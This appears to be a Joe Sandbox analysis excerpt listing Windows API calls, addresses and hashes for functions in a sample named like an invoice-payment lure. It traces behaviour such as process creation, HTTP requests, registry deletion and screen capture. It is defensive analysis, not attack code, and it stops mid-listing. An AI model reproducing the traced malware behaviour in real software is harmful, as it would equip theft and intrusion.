                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096B1B0
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096B1D4
                                                                              • _wcslen.LIBCMT ref: 0096B200
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096B214
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096B236
                                                                              • _wcslen.LIBCMT ref: 0096B332
                                                                                • Part of subcall function 009505A7: GetStdHandle.KERNEL32(000000F6), ref: 009505C6
                                                                              • _wcslen.LIBCMT ref: 0096B34B
                                                                              • _wcslen.LIBCMT ref: 0096B366
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0096B3B6
                                                                              • GetLastError.KERNEL32(00000000), ref: 0096B407
                                                                              • CloseHandle.KERNEL32(?), ref: 0096B439
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0096B44A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0096B45C
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0096B46E
                                                                              • CloseHandle.KERNEL32(?), ref: 0096B4E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 2178637699-0
                                                                              • Opcode ID: 58f1b2b817a7c3324864c84ee714f39869d36ba6796af844108264ce27383388
                                                                              • Instruction ID: c1dd8dc48dca4213bd08d5eb01406b61a58214a16dc8d8ad9d2c7eeb2395b445
                                                                              • Opcode Fuzzy Hash: 58f1b2b817a7c3324864c84ee714f39869d36ba6796af844108264ce27383388
                                                                              • Instruction Fuzzy Hash: 54F18E716083409FC714EF29C891B2ABBE5FF85714F14855DF9998B2A2DB31DC84CB52
                                                                              APIs
                                                                              • GetMenuItemCount.USER32(009B1990), ref: 00922F8D
                                                                              • GetMenuItemCount.USER32(009B1990), ref: 0092303D
                                                                              • GetCursorPos.USER32(?), ref: 00923081
                                                                              • SetForegroundWindow.USER32(00000000), ref: 0092308A
                                                                              • TrackPopupMenuEx.USER32(009B1990,00000000,?,00000000,00000000,00000000), ref: 0092309D
                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009230A9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                              • String ID: 0
                                                                              • API String ID: 36266755-4108050209
                                                                              • Opcode ID: 5f47c58cf50eb70633ae711e3d11f45c265214505073f5eb137ff6aba222c990
                                                                              • Instruction ID: a4228584f9b47cf262377b6cb2130d09c9e9acd5e58a3034a3a80341c992ae76
                                                                              • Opcode Fuzzy Hash: 5f47c58cf50eb70633ae711e3d11f45c265214505073f5eb137ff6aba222c990
                                                                              • Instruction Fuzzy Hash: 8E714B71644215BEEB258F25DD89FAABF78FF01324F204206F618AB1E0C7B1AD50DB50
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?), ref: 00976DEB
                                                                                • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00976E5F
                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00976E81
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00976E94
                                                                              • DestroyWindow.USER32(?), ref: 00976EB5
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008E0000,00000000), ref: 00976EE4
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00976EFD
                                                                              • GetDesktopWindow.USER32 ref: 00976F16
                                                                              • GetWindowRect.USER32(00000000), ref: 00976F1D
                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00976F35
                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00976F4D
                                                                                • Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                              • String ID: 0$tooltips_class32
                                                                              • API String ID: 2429346358-3619404913
                                                                              • Opcode ID: 881a5507634c9c7e4e9f13044825debc907b8069939d32962bfabd576c858c90
                                                                              • Instruction ID: aa9af0f17ab9ad994b1b4a5bfa2617feffd31e0b601a8d2eede28653ed9b4aa7
                                                                              • Opcode Fuzzy Hash: 881a5507634c9c7e4e9f13044825debc907b8069939d32962bfabd576c858c90
                                                                              • Instruction Fuzzy Hash: 2F719872108241AFDB21DF28DC58FBABBF9FB89304F54491DF98987261C770A949DB12
                                                                              APIs
                                                                                • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                              • DragQueryPoint.SHELL32(?,?), ref: 00979147
                                                                                • Part of subcall function 00977674: ClientToScreen.USER32(?,?), ref: 0097769A
                                                                                • Part of subcall function 00977674: GetWindowRect.USER32(?,?), ref: 00977710
                                                                                • Part of subcall function 00977674: PtInRect.USER32(?,?,00978B89), ref: 00977720
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 009791B0
                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009791BB
                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009791DE
                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00979225
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0097923E
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00979255
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00979277
                                                                              • DragFinish.SHELL32(?), ref: 0097927E
                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00979371
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                              • API String ID: 221274066-3440237614
                                                                              • Opcode ID: 2424a737f415793f12bf81c857d228040e314df25651628c6fd729f5ad84b8d8
                                                                              • Instruction ID: 164424bc6c56d67bc44ed3bc987c83d7326fe63b13c16e1a7229142288485ffb
                                                                              • Opcode Fuzzy Hash: 2424a737f415793f12bf81c857d228040e314df25651628c6fd729f5ad84b8d8
                                                                              • Instruction Fuzzy Hash: 31616772108341AFC701EF65DC85DAFBBE8FB89750F40092EF5A5921A1DB709A49CB92
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0095C4B0
                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0095C4C3
                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0095C4D7
                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0095C4F0
                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0095C533
                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0095C549
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0095C554
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0095C584
                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0095C5DC
                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0095C5F0
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0095C5FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                              • String ID:
                                                                              • API String ID: 3800310941-3916222277
                                                                              • Opcode ID: f5a7d149d1954c0613666d99f44cd73ae2fabff037be8b3c293921af234f0a79
                                                                              • Instruction ID: 7668a32dc1b8551235d73459f09717a4b6dd8ab2bcc04911e9db3adca0b70243
                                                                              • Opcode Fuzzy Hash: f5a7d149d1954c0613666d99f44cd73ae2fabff037be8b3c293921af234f0a79
                                                                              • Instruction Fuzzy Hash: E7514EF1504305BFDB21CFA6C988AAB7BBCFF04755F00441DF94996250EB34EA49AB60
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00978592
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 009785A2
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 009785AD
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009785BA
                                                                              • GlobalLock.KERNEL32(00000000), ref: 009785C8
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 009785D7
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 009785E0
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009785E7
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 009785F8
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0097FC38,?), ref: 00978611
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00978621
                                                                              • GetObjectW.GDI32(?,00000018,000000FF), ref: 00978641
                                                                              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00978671
                                                                              • DeleteObject.GDI32(00000000), ref: 00978699
                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009786AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                              • String ID:
                                                                              • API String ID: 3840717409-0
                                                                              • Opcode ID: ab53067a0da2a6176adf8170022cfd5fc2b7841b4e53842fe4a3225d3e9f7760
                                                                              • Instruction ID: 095435c52bee59a0c49331333d9c2b7a8e4b5584771e5023529c82313f390eac
                                                                              • Opcode Fuzzy Hash: ab53067a0da2a6176adf8170022cfd5fc2b7841b4e53842fe4a3225d3e9f7760
                                                                              • Instruction Fuzzy Hash: B54118B6644205BFDB119FA5CC8CEAB7BBCEF89B15F108058F919E7260DB309941DB60
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(00000000), ref: 00951502
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0095150B
                                                                              • VariantClear.OLEAUT32(?), ref: 00951517
                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009515FB
                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00951657
                                                                              • VariantInit.OLEAUT32(?), ref: 00951708
                                                                              • SysFreeString.OLEAUT32(?), ref: 0095178C
                                                                              • VariantClear.OLEAUT32(?), ref: 009517D8
                                                                              • VariantClear.OLEAUT32(?), ref: 009517E7
                                                                              • VariantInit.OLEAUT32(00000000), ref: 00951823
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                              • API String ID: 1234038744-3931177956
                                                                              • Opcode ID: 09d3138831771ab66d2aabf4dac91a1995d1302c90600632308658bcbc0ddc68
                                                                              • Instruction ID: b152dc8c1091713c57926e449b77d4a2dd89149fd8e40cd967d8a78a79f56c55
                                                                              • Opcode Fuzzy Hash: 09d3138831771ab66d2aabf4dac91a1995d1302c90600632308658bcbc0ddc68
                                                                              • Instruction Fuzzy Hash: A6D10172A00105DBCB00EF6AD885B7DB7B9FF45701F10845AF946AB191EB38DC4ADB62
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                                • Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
                                                                                • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
                                                                                • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
                                                                                • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096B6F4
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096B772
                                                                              • RegDeleteValueW.ADVAPI32(?,?), ref: 0096B80A
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0096B87E
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0096B89C
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0096B8F2
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0096B904
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0096B922
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0096B983
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0096B994
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                              • API String ID: 146587525-4033151799
                                                                              • Opcode ID: 611a915585bf49f1c1ea38344ab9e6a4196da99b6a72568945e3393da7835024
                                                                              • Instruction ID: c2b46c21e2ffdfd8621b3e5293ba174f24ac51e878cad8e046fccbb1aa00a534
                                                                              • Opcode Fuzzy Hash: 611a915585bf49f1c1ea38344ab9e6a4196da99b6a72568945e3393da7835024
                                                                              • Instruction Fuzzy Hash: 24C19D31208241AFD714DF18C495F2ABBE5FF85308F14845CF4AA8B2A2DB75ED85CB92
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 009625D8
                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009625E8
                                                                              • CreateCompatibleDC.GDI32(?), ref: 009625F4
                                                                              • SelectObject.GDI32(00000000,?), ref: 00962601
                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0096266D
                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009626AC
                                                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009626D0
                                                                              • SelectObject.GDI32(?,?), ref: 009626D8
                                                                              • DeleteObject.GDI32(?), ref: 009626E1
                                                                              • DeleteDC.GDI32(?), ref: 009626E8
                                                                              • ReleaseDC.USER32(00000000,?), ref: 009626F3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                              • String ID: (
                                                                              • API String ID: 2598888154-3887548279
                                                                              • Opcode ID: e73b8247008849bed771c93f804645a0aec80599d4a53318b5cddef261d74284
                                                                              • Instruction ID: 3fc30eaa3319263ee663a4941c1dd2d8a2712dfdd6eeb3657ae414fd859fbbe3
                                                                              • Opcode Fuzzy Hash: e73b8247008849bed771c93f804645a0aec80599d4a53318b5cddef261d74284
                                                                              • Instruction Fuzzy Hash: 5761E5B6D04219EFCF14CFA4D884EAEBBB5FF48310F20852AE559A7250D774A941DF50
                                                                              APIs
                                                                              • ___free_lconv_mon.LIBCMT ref: 0091DAA1
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D659
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D66B
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D67D
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D68F
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6A1
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6B3
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6C5
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6D7
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6E9
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6FB
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D70D
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D71F
                                                                                • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D731
                                                                              • _free.LIBCMT ref: 0091DA96
                                                                                • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                                • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                              • _free.LIBCMT ref: 0091DAB8
                                                                              • _free.LIBCMT ref: 0091DACD
                                                                              • _free.LIBCMT ref: 0091DAD8
                                                                              • _free.LIBCMT ref: 0091DAFA
                                                                              • _free.LIBCMT ref: 0091DB0D
                                                                              • _free.LIBCMT ref: 0091DB1B
                                                                              • _free.LIBCMT ref: 0091DB26
                                                                              • _free.LIBCMT ref: 0091DB5E
                                                                              • _free.LIBCMT ref: 0091DB65
                                                                              • _free.LIBCMT ref: 0091DB82
                                                                              • _free.LIBCMT ref: 0091DB9A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                              • String ID:
                                                                              • API String ID: 161543041-0
                                                                              • Opcode ID: 4915e38842f4ccd9ead14123139cd936ef954cef22be7a9a5cda37a2438848dd
                                                                              • Instruction ID: 94428ffdfa8a039cd704d524d4a025e8651597409198319eb0af3758bcb051f5
                                                                              • Opcode Fuzzy Hash: 4915e38842f4ccd9ead14123139cd936ef954cef22be7a9a5cda37a2438848dd
                                                                              • Instruction Fuzzy Hash: 7B3148327496089FEB22AB39E945B9A77ECFF40320F114419E459DB191DB34ACE08720
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0094369C
                                                                              • _wcslen.LIBCMT ref: 009436A7
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00943797
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0094380C
                                                                              • GetDlgCtrlID.USER32(?), ref: 0094385D
                                                                              • GetWindowRect.USER32(?,?), ref: 00943882
                                                                              • GetParent.USER32(?), ref: 009438A0
                                                                              • ScreenToClient.USER32(00000000), ref: 009438A7
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00943921
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0094395D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                              • String ID: %s%u
                                                                              • API String ID: 4010501982-679674701
                                                                              • Opcode ID: 1e5189f17835b0bbe99a21d7cb9183287af3bb3e010bbfac520e13ee5b4e8981
                                                                              • Instruction ID: 986f6c1a87775f72c34eab17d503b611bab44fb9a30ac773821e170bd0345620
                                                                              • Opcode Fuzzy Hash: 1e5189f17835b0bbe99a21d7cb9183287af3bb3e010bbfac520e13ee5b4e8981
                                                                              • Instruction Fuzzy Hash: 2B919E71204606EFD719DF34C885FAAF7A8FF44354F108629FAA9D2190DB30EA55CB91
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00944994
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 009449DA
                                                                              • _wcslen.LIBCMT ref: 009449EB
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 009449F7
                                                                              • _wcsstr.LIBVCRUNTIME ref: 00944A2C
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00944A64
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00944A9D
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00944AE6
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00944B20
